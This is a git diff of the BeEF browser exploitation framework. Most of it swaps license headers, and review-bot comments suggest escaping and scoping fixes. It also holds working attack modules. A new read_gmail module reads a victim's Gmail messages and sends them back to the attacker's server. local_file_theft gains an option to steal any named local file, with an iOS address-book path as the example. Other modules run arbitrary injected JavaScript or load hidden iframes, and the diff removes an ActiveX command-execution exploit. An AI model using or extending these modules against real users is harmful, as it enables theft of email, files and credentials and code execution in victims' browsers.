diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index c8b4e2565..0f4ce6368 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin [+] Summary: diff --git a/modules/metasploit/browser_autopwn/command.js b/modules/metasploit/browser_autopwn/command.js index 11829cca4..a4f91072c 100644 --- a/modules/metasploit/browser_autopwn/command.js +++ b/modules/metasploit/browser_autopwn/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = '<%= @sploit_url %>'; diff --git a/modules/metasploit/browser_autopwn/config.yaml b/modules/metasploit/browser_autopwn/config.yaml index f2d6c67ce..46198ce73 100644 --- a/modules/metasploit/browser_autopwn/config.yaml +++ b/modules/metasploit/browser_autopwn/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb index 1cebf51ac..bb18a89c4 100644 --- a/modules/metasploit/browser_autopwn/module.rb +++ b/modules/metasploit/browser_autopwn/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Browser_autopwn < BeEF::Core::Command diff --git a/modules/misc/google_search/command.js b/modules/misc/google_search/command.js index 93366a3d5..52b15152f 100644 --- a/modules/misc/google_search/command.js +++ b/modules/misc/google_search/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var query = '<%= @query.gsub(/'/, "\\'") %>'; diff --git a/modules/misc/google_search/config.yaml b/modules/misc/google_search/config.yaml index bc0cc6b8f..fc9868ecb 100644 --- a/modules/misc/google_search/config.yaml +++ b/modules/misc/google_search/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/misc/google_search/module.rb b/modules/misc/google_search/module.rb index afec66958..b93b59719 100644 --- a/modules/misc/google_search/module.rb +++ b/modules/misc/google_search/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Google_search < BeEF::Core::Command diff --git a/modules/misc/iframe_keylogger/command.js b/modules/misc/iframe_keylogger/command.js index 7f1ed6fd1..cafc8cadd 100644 --- a/modules/misc/iframe_keylogger/command.js +++ b/modules/misc/iframe_keylogger/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // logged keystrokes array diff --git a/modules/misc/iframe_keylogger/config.yaml b/modules/misc/iframe_keylogger/config.yaml index f65092754..c56cb0fef 100644 --- a/modules/misc/iframe_keylogger/config.yaml +++ b/modules/misc/iframe_keylogger/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb index 6156f8ecd..a57d69285 100644 --- a/modules/misc/iframe_keylogger/module.rb +++ b/modules/misc/iframe_keylogger/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_keylogger < BeEF::Core::Command diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js index 21e6987d5..0d041d9aa 100644 --- a/modules/misc/iframe_sniffer/command.js +++ b/modules/misc/iframe_sniffer/command.js 
@@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var inputURL = '<%= @inputUrl %>'; var anchorsToCheck = '<%= @anchorsToCheck %>'; diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml index 61c796fa1..70ec201e5 100644 --- a/modules/misc/iframe_sniffer/config.yaml +++ b/modules/misc/iframe_sniffer/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb index 7af2804af..effa6a213 100644 --- a/modules/misc/iframe_sniffer/module.rb +++ b/modules/misc/iframe_sniffer/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_sniffer < BeEF::Core::Command diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js new file mode 100644 index 000000000..01eab25c9 --- /dev/null +++ b/modules/misc/invisible_iframe/command.js @@ -0,0 +1,15 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var target = "<%= @target %>"; + var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + iframe_<%= @command_id %>.setAttribute('src', target); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=IFrame created'); + +}); diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml new file mode 100644 index 000000000..b7686b944 --- /dev/null +++ b/modules/misc/invisible_iframe/config.yaml 
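Review bot: In the new modules/misc/invisible_iframe/command.js, `var target = "<%= @target %>";` writes the module option straight into a double-quoted JavaScript literal with no escaping. A value containing a double quote, a backslash or a line break yields a script that fails to parse or that ends the literal early, so the option should be encoded for a JavaScript string context where it is rendered. One way, assuming the JSON library is loaded where the template is evaluated, is `var target = <%= @target.to_json %>;`. The same unescaped pattern is used for `@rhost`, `@rport`, `@nick`, `@channel` and `@message` in inter_protocol_irc/command.js in this commit.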
@@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + invisible_iframe: + enable: true + category: "Misc" + name: "Create Invisible Iframe" + description: "Creates an invisible iframe." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb new file mode 100644 index 000000000..357c78f96 --- /dev/null +++ b/modules/misc/invisible_iframe/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Invisible_iframe < BeEF::Core::Command + + def self.options + return [ + {'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js index 148f79d8f..868eb9b4c 100644 --- a/modules/misc/local_file_theft/command.js +++ b/modules/misc/local_file_theft/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // local_file_theft // // Shamelessly plagurised from kos.io/xsspwn @@ -86,6 +77,16 @@ result = ''; } } + fileList['custom']= { + // user defined + "discover" :'', + + "post" :{ + 'result':'<%== @target_file %>', + } + } + + functionList = { mac:{ // OS X disovery @@ -138,11 +139,25 @@ result = ''; grabFiles(homedir,"ios") } } - - alert("ipad") + return true; } }, + custom:{ + // Grab custom stuff + discover : function(){ + tmp = new XMLHttpRequest() + tmp.open('get',fileList['custom']['discover']) + tmp.send() + tmp.onreadystatechange=function(){ + if(tmp.readyState==4){ + homedir = "file:///"; + grabFiles(homedir,"custom") + } + } + return true; + } + }, android:{ // figure out what app (gmail, browser, or dolphin?) android discover : function(){ 
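Review bot: The `custom` entry added to `functionList` in the third hunk of modules/misc/local_file_theft/command.js assigns `tmp` and `homedir` without `var`, so both land on the global object. Any other `discover` callback that uses the same names shares that state with this one, and a late `onreadystatechange` can then read a `tmp` that another branch has replaced. Unless code outside the hunk relies on `homedir` being global, declare them locally: `var tmp = new XMLHttpRequest()` and `var homedir = "file:///";`. The `functionList` object starts and ends outside this hunk, and the neighbouring entries appear to follow the same undeclared pattern, so the change is best applied to all of them together.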
@@ -172,19 +187,27 @@ result = ''; function identify(){ - if(/.*Android.*/.test(navigator.userAgent)){ - return "android" - } else if(/Linux.*/i.test(navigator.platform)){ - return "linux" - } else if(/iP.*/i.test(navigator.platform)){ - return "ios" - } else if(/.*Mac.*/i.test(navigator.userAgent)){ - return "mac" - } else if(/.*Windows.*/i.test(navigator.userAgent)){ - return "windows" - } else if(/.*hpwOS.*/i.test(navigator.platform)){ - return "webos" - } + + // custom file is specified + if ('<%== @target_file %>' != 'autodetect') { + return "custom" + + // determine a good file to steal based on platform + } else { + if(/.*Android.*/.test(navigator.userAgent)){ + return "android" + } else if(/Linux.*/i.test(navigator.platform)){ + return "linux" + } else if(/iP.*/i.test(navigator.platform)){ + return "ios" + } else if(/.*Mac.*/i.test(navigator.userAgent)){ + return "mac" + } else if(/.*Windows.*/i.test(navigator.userAgent)){ + return "windows" + } else if(/.*hpwOS.*/i.test(navigator.platform)){ + return "webos" + } + } } diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml index 4c44194e1..27ae15b9a 100644 --- a/modules/misc/local_file_theft/config.yaml +++ b/modules/misc/local_file_theft/config.yaml 
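Review bot: The string `'autodetect'` that `identify()` compares against is a sentinel whose only definition is the default `'value'` of the `target_file` option added to module.rb later in this commit, and neither side documents the link. A comment above the check, for example `// 'autodetect' is the default of the target_file option in module.rb; any other value selects the "custom" entry`, would keep the two from drifting apart. The option's `'description'` in module.rb could likewise say that leaving the field at `autodetect` keeps the platform detection. As a point of style, the `else` after `return "custom"` is redundant and pushes the unchanged platform checks one level deeper than they need to be.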
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # @@ -23,7 +13,7 @@ beef: enable: true category: "Misc" name: "Local File Theft" - description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system." + description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system." authors: ["mh"] target: - working: ["All"] + working: ["S"] diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb index d75a3d236..f720d70a4 100644 --- a/modules/misc/local_file_theft/module.rb +++ b/modules/misc/local_file_theft/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # @@ -19,6 +9,16 @@ class Local_file_theft < BeEF::Core::Command + def self.options + return [ + {'name' => 'target_file', + 'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', + 'ui_label' => 'Target file', + 'value' => 'autodetect' + } + ] + end + def post_execute content = {} content['result'] = @datastore['result'] diff --git a/modules/misc/raw_javascript/command.js b/modules/misc/raw_javascript/command.js index 15ece6d01..ac69d88d4 100644 --- a/modules/misc/raw_javascript/command.js +++ b/modules/misc/raw_javascript/command.js 
@@ -1,33 +1,24 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var result; - - try { - result = function() {<%= @cmd %>}(); - } catch(e) { - for(var n in e) - result+= n + " " + e[n] + "\n"; - } - - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); -}); - - - - - - +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result; + + try { + result = function() {<%= @cmd %>}(); + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); +}); + + + + + + diff --git a/modules/misc/raw_javascript/config.yaml b/modules/misc/raw_javascript/config.yaml index 3f9512332..f344295f8 100644 --- a/modules/misc/raw_javascript/config.yaml +++ b/modules/misc/raw_javascript/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb index 5a507d0b8..c5f97855d 100644 --- a/modules/misc/raw_javascript/module.rb +++ b/modules/misc/raw_javascript/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Raw_javascript < BeEF::Core::Command 
diff --git a/modules/exploits/activex_command_execution/command.js b/modules/misc/read_gmail/command.js old mode 100755 new mode 100644 similarity index 60% rename from modules/exploits/activex_command_execution/command.js rename to modules/misc/read_gmail/command.js index c6eeac3d6..680c50088 --- a/modules/exploits/activex_command_execution/command.js +++ b/modules/misc/read_gmail/command.js @@ -14,21 +14,31 @@ // limitations under the License. // beef.execute(function() { + var result; - var cmd = '<%= @cmd.gsub(/'/, "\\'") %>'; - var result = "command was not sent"; + try { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/feed/atom', false); + x.send(); - try { - var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd); - if (shell.toString() == 0) { - result = "command sent"; - } else { - result = "command failed"; + str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g; + var match; + while(match = re.exec(str)) { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false); + x.send(); + result += x.responseText; } - } catch(e) { - result = "command failed"; - } - + + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); - }); + + + + + + diff --git a/modules/exploits/activex_command_execution/config.yaml b/modules/misc/read_gmail/config.yaml old mode 100755 new mode 100644 similarity index 59% rename from modules/exploits/activex_command_execution/config.yaml rename to modules/misc/read_gmail/config.yaml index 1e0995937..2b0baefbf --- a/modules/exploits/activex_command_execution/config.yaml +++ b/modules/misc/read_gmail/config.yaml 
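Review bot: The context lines of this hunk show that the new `read_gmail/command.js` still carries the header ending in `// limitations under the License.`, inherited from the file it was renamed from, while the other files in this part of the commit move to the short `See the file 'doc/COPYING' for copying permission` header. The hunks for `read_gmail/config.yaml` and `read_gmail/module.rb` likewise start at or after the old notice without replacing it, so all three files appear to have been missed by the header change. Inside this hunk, `x` and `str` are also assigned without `var`, unlike `re` and `match`; declaring them next to `var result;` (for example `var x, str;`) would keep them from leaking into the global scope.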
@@ -15,12 +15,11 @@ # beef: module: - activex_command_execution: + read_gmail: enable: true - category: "Exploits" - name: "ActiveX Command Execution" - description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.

The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled." - authors: ["bcoles"] + category: "Misc" + name: "Read Gmail" + description: "If we are able to run in the context of mail.google.com (either by SOP bypass or other issue) then lets go read some email, grabs unread message ids from gmails atom feed, then grabs conent of each message" + authors: ["mh"] target: - user_notify: ["IE"] - not_working: ["ALL"] + user_notify: ['ALL'] diff --git a/modules/exploits/window_mail_client_dos/module.rb b/modules/misc/read_gmail/module.rb similarity index 75% rename from modules/exploits/window_mail_client_dos/module.rb rename to modules/misc/read_gmail/module.rb index d752b3e4b..d0ec4d52c 100644 --- a/modules/exploits/window_mail_client_dos/module.rb +++ b/modules/misc/read_gmail/module.rb @@ -13,6 +13,14 @@ # See the License for the specific language governing permissions and # limitations under the License. # -class Windows_mail_client_dos < BeEF::Core::Command +class Read_gmail < BeEF::Core::Command + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'result' => @datastore['result']}) + end + end diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js index 333bce662..162cffb53 100644 --- a/modules/network/detect_soc_nets/command.js +++ b/modules/network/detect_soc_nets/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var facebookresult = ""; diff --git a/modules/network/detect_soc_nets/config.yaml b/modules/network/detect_soc_nets/config.yaml index 90a1c6355..33e374c5e 100644 --- a/modules/network/detect_soc_nets/config.yaml +++ b/modules/network/detect_soc_nets/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb index 8cb1549e1..0cb515b6b 100644 --- a/modules/network/detect_soc_nets/module.rb +++ b/modules/network/detect_soc_nets/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_soc_nets < BeEF::Core::Command diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js index 78b94c763..fb9dc6a47 100644 --- a/modules/network/detect_tor/command.js +++ b/modules/network/detect_tor/command.js 
